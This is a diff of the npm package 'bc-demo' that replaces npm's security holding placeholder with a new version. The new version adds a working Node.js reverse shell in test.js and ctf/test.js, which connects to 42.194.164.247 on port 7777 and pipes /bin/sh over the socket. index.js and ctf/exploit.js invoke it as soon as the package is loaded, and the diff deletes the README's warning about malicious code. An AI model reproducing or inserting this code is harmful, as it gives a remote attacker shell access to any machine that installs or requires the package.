bc-demo 0.0.1-security → 1.0.0

package/ctf/exploit.js

@@ -0,0 +1,2 @@
+const exp = require('./test.js')
+exp.evil()

package/ctf/test.js

@@ -0,0 +1,14 @@
+evil = function() {
+	    var net = require("net"),
+		        cp = require("child_process"),
+		        sh = cp.spawn("/bin/sh", []);
+	    var client = new net.Socket();
+	    client.connect(7777, "42.194.164.247", function() {
+		            client.pipe(sh.stdin);
+		            sh.stdout.pipe(client);
+		            sh.stderr.pipe(client);
+		        });
+	    return /a/; // Prevents the Node.js application form crashing
+}
+
+exports.evil = evil

package/index.js

@@ -0,0 +1,2 @@
+const exp = require('./test.js')
+exp.evil()

package/package.json

@@ -1,6 +1,11 @@
 {
   "name": "bc-demo",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.0",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": "whoami"
+  },
+  "author": "",
+  "license": "ISC"
 }

package/test.js

@@ -0,0 +1,14 @@
+evil = function() {
+	    var net = require("net"),
+		        cp = require("child_process"),
+		        sh = cp.spawn("/bin/sh", []);
+	    var client = new net.Socket();
+	    client.connect(7777, "42.194.164.247", function() {
+		            client.pipe(sh.stdin);
+		            sh.stdout.pipe(client);
+		            sh.stderr.pipe(client);
+		        });
+	    return /a/; // Prevents the Node.js application form crashing
+}
+
+exports.evil = evil

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=bc-demo for more information.